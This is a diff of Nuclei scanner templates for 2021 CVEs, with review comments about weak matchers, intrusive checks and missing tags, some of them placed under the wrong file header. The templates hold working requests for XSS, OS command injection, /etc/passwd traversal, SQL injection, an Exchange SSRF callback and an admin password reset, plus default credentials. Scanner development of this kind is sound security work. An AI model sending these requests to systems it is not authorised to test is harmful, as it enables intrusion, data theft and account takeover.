"numRowsRead" + - "numRowsIndexed" + part: body + condition: and + + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2021/cve-2021-26247.yaml b/nuclei-templates/CVE-2021/cve-2021-26247.yaml new file mode 100644 index 0000000000..3a51363f35 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-26247.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-26247 + +info: + name: Unauthenticated XSS Cacti - auth_changepassword.php + author: dhiyaneshDK + severity: medium + description: As an unauthenticated remote user, visit "http:///auth_changepassword.php?ref=" to successfully execute the JavaScript payload present in the "ref" URL parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-26247 + - https://www.cacti.net/info/changelog + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-26247 + cwe-id: CWE-79 + tags: cve,cve2021,cacti,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-26598.yaml b/nuclei-templates/CVE-2021/cve-2021-26598.yaml new file mode 100644 index 0000000000..148674a260 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-26598.yaml 
@@ -0,0 +1,57 @@
+id: CVE-2021-26598
+
+info:
+ name: ImpressCMS - Incorrect Authorization
+ author: gy741,pdteam
+ severity: medium
+ description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
+ reference:
+ - https://hackerone.com/reports/1081137
+ - http://karmainsecurity.com/KIS-2022-03
+ - https://github.com/ImpressCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26598
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-26598
+ cwe-id: CWE-287
+ metadata:
+ shodan-query: http.html:"ImpressCMS"
+ tags: cve,cve2021,impresscms,unauth,cms
+
+requests:
+ - raw:
+ - |
+ GET /misc.php?action=showpopups&type=friend HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+
+ - |
+ GET /include/findusers.php?token={{token}} HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+
+ cookie-reuse: true
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_2
+ words:
+ - 'last_login'
+ - 'user_regdate'
+ - 'uname'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: token
+ internal: true
+ group: 1
+ regex:
+ - "REQUEST' value='(.*?)'"
+ - 'REQUEST" value="(.*?)"'
diff --git a/nuclei-templates/CVE-2021/cve-2021-26855.yaml b/nuclei-templates/CVE-2021/cve-2021-26855.yaml
new file mode 100644
index 0000000000..ae5e857ac7
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-26855.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-26855
+
+info:
+ name: Microsoft Exchange Server SSRF Vulnerability
+ author: madrobot
+ severity: critical
+ description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
+ reference:
+ - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
+ - https://proxylogon.com/#timeline
+ - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
+ - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
+ - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
+ remediation: Apply the appropriate security update.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-26855
+ tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft
+
+requests:
+ - raw:
+ - |
+ GET /owa/auth/x.js HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+# Enhanced by mp on 2022/02/04
diff --git a/nuclei-templates/CVE-2021/cve-2021-27132.yaml b/nuclei-templates/CVE-2021/cve-2021-27132.yaml
deleted file mode 100644
index 7f46e618ad..0000000000
--- a/nuclei-templates/CVE-2021/cve-2021-27132.yaml
+++ /dev/null
@@ -1,40 +0,0 @@ -id: CVE-2021-27132 - -info: - name: Sercomm VD625 Smart Modems - CRLF Injection - author: geeknik - severity: critical - description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header. - reference: - - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 - - http://sercomm.com - - https://nvd.nist.gov/vuln/detail/CVE-2021-27132 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-27132 - cwe-id: CWE-74 - tags: cve,cve2021,crlf,injection - -requests: - - method: GET - path: - - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" - - matchers-condition: and - matchers: - - type: status - status: - - 404 - part: header - - - type: word - words: - - "Content-Disposition: attachment;filename=test.txt" - - "Set-Cookie:CRLFInjection=Test" - - "Location: example.com" - - "X-XSS-Protection:0" - part: header - condition: and - -# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/cve-2021-27519.yaml b/nuclei-templates/CVE-2021/cve-2021-27519.yaml deleted file mode 100644 index 93e44aea56..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-27519.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2021-27519 - -info: - name: FUDForum 3.1.0 - Cross-Site Scripting - author: kh4sh3i - severity: medium - description: | - FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. - reference: - - https://www.exploit-db.com/exploits/49942 - - https://github.com/fudforum/FUDforum/issues/2 - - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27519 - cwe-id: CWE-79 - metadata: - shodan-query: 'http.html:"Powered by: FUDforum"' - verified: "true" - tags: xss,fudforum,edb,packetstorm,cve,cve2021 - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-27561.yaml b/nuclei-templates/CVE-2021/cve-2021-27561.yaml new file mode 100644 index 0000000000..b448188200 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-27561.yaml 
@@ -0,0 +1,48 @@
+id: CVE-2021-27561
+
+info:
+ name: YeaLink DM 3.6.0.20 - Remote Command Injection
+ author: shifacyclewala,hackergautam
+ severity: critical
+ description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.
+ reference:
+ - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561
+ - https://ssd-disclosure.com/?p=4688
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-27561
+ cwe-id: CWE-77
+ tags: cve,cve2021,rce,yealink,mirai
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ condition: and
+ part: body
+ words:
+ - 'uid'
+ - 'gid'
+ - 'groups'
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ regex:
+ - "(u|g)id=.*"
+
+# Enhanced by mp on 2022/05/17
diff --git a/nuclei-templates/CVE-2021/cve-2021-28149.yaml b/nuclei-templates/CVE-2021/cve-2021-28149.yaml
new file mode 100644
index 0000000000..9a8a2cc332
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-28149.yaml
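Review bot: The body matcher looks for the bare words `uid`, `gid` and `groups`, which can occur in any JSON document that describes users or permissions, so an unrelated `application/json` response with status 200 can match. cve-2021-28151.yaml in this commit anchors the same kind of check on `uid=`, `gid=` and `groups=`, and the extractor here already expects the `=`; using those three words keeps the match on actual `id` output. The second reference, `cvename.cgi?name=2021-27561`, lacks the `CVE-` prefix that the same link has in cve-2021-25112.yaml.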
@@ -0,0 +1,49 @@
+id: CVE-2021-28149
+
+info:
+ name: Hongdian Directory Traversal
+ author: gy741
+ severity: medium
+ description: |
+ Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
+ reference:
+ - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149
+ - http://en.hongdian.com/Products/Details/H8922
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2021-28149
+ cwe-id: CWE-22
+ tags: cve,cve2021,hongdian,traversal
+
+requests:
+ - raw:
+ - |
+ GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+
+ - |
+ GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic YWRtaW46YWRtaW4=
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "application/octet-stream"
+ part: header
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - "sshd:[x*]"
+ - "root:[$]"
+ part: body
diff --git a/nuclei-templates/CVE-2021/cve-2021-28151.yaml b/nuclei-templates/CVE-2021/cve-2021-28151.yaml
new file mode 100644
index 0000000000..9a57731f21
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-28151.yaml
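Review bot: Both requests carry a fixed `Authorization: Basic` value for a guest and an admin account whose password equals the user name, but neither `description:` nor `tags:` says that the check depends on those accounts. A device whose passwords were changed rejects the request and is reported clean although the traversal in `log_download.cgi` may still be present; a hit, in turn, also means one of those accounts is still active. I would state this in the description, for example `Requires the default guest or admin account; a negative result does not show the device is patched.` The same applies to cve-2021-28151.yaml.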
@@ -0,0 +1,57 @@
+id: CVE-2021-28151
+
+info:
+ name: Hongdian Command Injection
+ author: gy741
+ severity: high
+ description: |
+ Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest.
+ reference:
+ - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28151
+ - http://en.hongdian.com/Products/Details/H8922
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2021-28151
+ cwe-id: CWE-78
+ tags: cve,cve2021,hongdian,rce,injection
+
+requests:
+ - raw:
+ - |
+ POST /tools.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}/tools.cgi
+
+ op_type=ping&destination=%3Bid
+
+ - |
+ POST /tools.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic YWRtaW46YWRtaW4=
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}/tools.cgi
+
+ op_type=ping&destination=%3Bid
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: word
+ words:
+ - "uid="
+ - "gid="
+ - "groups="
+ part: body
+ condition: and
diff --git a/nuclei-templates/CVE-2021/cve-2021-28164.yaml b/nuclei-templates/CVE-2021/cve-2021-28164.yaml
new file mode 100644
index 0000000000..be040c4bd7
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-28164.yaml
@@ -0,0 +1,41 @@ +id: CVE-2021-28164 + +info: + name: Jetty Authorization Before Parsing and Canonicalization + author: noamrathaus + severity: medium + description: | + The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. + reference: + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 + - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty + - https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-28164 + cwe-id: CWE-200 + tags: cve,cve2021,jetty + +requests: + - method: GET + path: + - "{{BaseURL}}/%2e/WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + - "java.sun.com" + part: body + condition: and + + - type: word + part: header + words: + - "application/xml" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-28377.yaml b/nuclei-templates/CVE-2021/cve-2021-28377.yaml deleted file mode 100644 index 03cc1bbced..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-28377.yaml +++ /dev/null 
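Review bot: The body word matcher lists an empty string (`- ""`) next to `"java.sun.com"`, and under `condition: and` an empty word is satisfied by any response, so the check rests on `java.sun.com` plus the `application/xml` header alone. The entry was presumably a markup literal lost somewhere along the way; restore it (for web.xml something like `- "<web-app"`) or remove the empty item. The same empty entry appears in the CVE-2021-31537, CVE-2021-31589 and CVE-2021-34640 hunks, where it stands in for the reflected-payload check. As written, those XSS templates match on the product string (`SIS-REWE`, `bomgar`) or on status and content type only, and will flag patched instances.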
@@ -1,33 +0,0 @@ -id: CVE-2021-28377 - -info: - name: Joomla! ChronoForums 2.0.11 - Local File Inclusion - author: 0x_Akoko - severity: medium - description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. - reference: - - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-28377 - cwe-id: CWE-22 - tags: cve,cve2021,chronoforums,lfi,joomla - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2021/cve-2021-29203.yaml b/nuclei-templates/CVE-2021/cve-2021-29203.yaml new file mode 100644 index 0000000000..2189884675 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-29203.yaml 
@@ -0,0 +1,56 @@ +id: CVE-2021-29203 + +info: + name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass + author: madrobot + severity: critical + description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. + reference: + - https://www.tenable.com/security/research/tra-2021-15 + - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 + - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-29203 + cwe-id: CWE-287 + tags: hpe,cve,cve2021,bypass + +requests: + - raw: + - | + PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"Password":"{{randstr}}"} + + - | + POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"UserName":"Administrator","Password":"{{randstr}}"} + + matchers-condition: and + matchers: + + - type: status + status: + - 201 + + - type: word + condition: and + part: header + words: + - "X-Auth-Token" + - "PasswordReset" + - "Location" + + - type: word + part: body + words: + - "Base.1.0.Created" + +# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/cve-2021-29442.yaml b/nuclei-templates/CVE-2021/cve-2021-29442.yaml new file mode 100644 index 0000000000..9f495334b8 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-29442.yaml 
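Review bot: The first request is a state-changing `PATCH` to `/redfish/v1/SessionService/ResetPassword/1/` that sets the password to `{{randstr}}`. A successful check therefore leaves the account (apparently Administrator, given the login that follows) with a password the owner never chose, and nothing in `info` warns about it. Add `intrusive` to the tag list, `tags: hpe,cve,cve2021,bypass,intrusive`, and a description sentence saying the scan resets the password and that it must be restored afterwards, so the template can be excluded from routine scans of production systems. The CVE-2021-34621 hunk has the same gap: it registers an account with `wp_capabilities[administrator]` set and leaves it on the site.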
@@ -0,0 +1,39 @@ +id: CVE-2021-29442 + +info: + name: Nacos prior to 1.4.1 Missing Authentication Check + author: dwisiswant0 + severity: high + description: | + In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. + While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. + These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql) + reference: + - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ + - https://github.com/alibaba/nacos/issues/4463 + - https://github.com/alibaba/nacos/pull/4517 + - https://github.com/advisories/GHSA-36hp-jr8h-556f + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-29442 + cwe-id: CWE-306 + tags: nacos,auth-bypass,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header + - type: regex + regex: + - "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\"" + part: body diff --git a/nuclei-templates/CVE-2021/cve-2021-29484.yaml b/nuclei-templates/CVE-2021/cve-2021-29484.yaml new file mode 100644 index 0000000000..937184490c --- /dev/null 
+++ b/nuclei-templates/CVE-2021/cve-2021-29484.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-29484 + +info: + name: DOM XSS in Ghost CMS + author: rootxharsh,iamnoooob + severity: medium + description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site. + reference: + - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg + - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 + - https://www.npmjs.com/package/ghost + - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-29484 + cwe-id: CWE-79 + tags: cve,cve2021,xss,ghost + +requests: + - method: GET + path: + - "{{BaseURL}}/ghost/preview" + + matchers-condition: and + matchers: + - type: word + words: + - 'XMLHttpRequest.prototype.open' + part: body + + - type: word + words: + - 'text/html' + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-30151.yaml b/nuclei-templates/CVE-2021/cve-2021-30151.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-30151.yaml rename to nuclei-templates/CVE-2021/cve-2021-30151.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-30461.yaml b/nuclei-templates/CVE-2021/cve-2021-30461.yaml new file mode 100644 index 0000000000..b8e046e7d5 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-30461.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2021-30461 + +info: + name: VoipMonitor Pre-Auth-RCE + author: shifacyclewala,hackergautam + severity: critical + description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor. + + reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-30461 + cwe-id: CWE-94 + +requests: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + + SPOOLDIR=test".system(id)."&recheck=Recheck + + matchers-condition: and + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + - "VoIPmonitor installation" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-31537.yaml b/nuclei-templates/CVE-2021/cve-2021-31537.yaml new file mode 100644 index 0000000000..4ef98e0a48 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-31537.yaml 
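Review bot: The `info` block has no `tags:` line, unlike the other templates added in this patch, so tag-based selection or exclusion never sees this template even though its request body runs `system(id)` on the target. Add a line such as `tags: cve,cve2021,voipmonitor,rce`. `reference:` is also written as a single scalar where the sibling templates use a list, and `cvss-score: 9.80` differs from the `9.8` form used elsewhere.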
@@ -0,0 +1,36 @@ +id: CVE-2021-31537 + +info: + name: SIS-REWE GO version 7.5.0/12C XSS + author: geeknik + severity: medium + description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + reference: + - https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ + - http://seclists.org/fulldisclosure/2021/May/20 + - https://sisinformatik.com/rewe-go/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-31537 + cwe-id: CWE-79 + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "SIS-REWE" + condition: and + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-31589.yaml b/nuclei-templates/CVE-2021/cve-2021-31589.yaml new file mode 100644 index 0000000000..f28ff8aa59 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-31589.yaml 
@@ -0,0 +1,40 @@ +id: CVE-2021-31589 + +info: + name: BeyondTrust Remote Support Reflected XSS + author: Ahmed Abou-Ela + severity: medium + description: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. + reference: + - https://packetstormsecurity.com/files/165408 + - https://cxsecurity.com/issue/WLB-2022010013 + - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb + - https://www.beyondtrust.com/docs/release-notes/index.htm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-31589 + cwe-id: CWE-79 + metadata: + google-dork: '"BeyondTrust" "Redistribution Prohibited"' + shodan-query: 'set-cookie: nsbase_session' + tags: cve,cve2021,beyondtrust,bomgar,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" + + matchers-condition: and + matchers: + - type: word + case-insensitive: true + part: body + words: + - '' + - 'bomgar' + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-31856.yaml b/nuclei-templates/CVE-2021/cve-2021-31856.yaml new file mode 100644 index 0000000000..e087dac85d --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-31856.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2021-31856 + +info: + name: Layer5 Meshery 0.5.2 - SQL Injection + author: princechaddha + severity: critical + description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns + in models/meshery_pattern_persister.go). + reference: + - https://github.com/ssst0n3/CVE-2021-31856 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 + - https://meshery.io + - https://github.com/layer5io/meshery/pull/2745 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-31856 + cwe-id: CWE-89 + tags: sqli,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0" + + matchers-condition: and + matchers: + + - type: word + words: + - "709b38b27304df6257a86a60df742c4c" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/CVE-2021-32172.yaml b/nuclei-templates/CVE-2021/cve-2021-32172.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-32172.yaml rename to nuclei-templates/CVE-2021/cve-2021-32172.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-3223.yaml b/nuclei-templates/CVE-2021/cve-2021-3223.yaml deleted file mode 100644 index fe7e20a056..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-3223.yaml +++ /dev/null 
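Review bot: The description names the vulnerable endpoint as `/experimental/patternfiles`, but the request goes to `/api/experimental/patternfile`; someone building a log query or WAF rule from the description after a hit would search for the wrong path. Align the description with the path the template requests, after checking it against the linked pull request. The tag list `sqli,cve,cve2021` also omits the product, so `tags: sqli,cve,cve2021,meshery` would let the template be selected per product like its neighbours.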
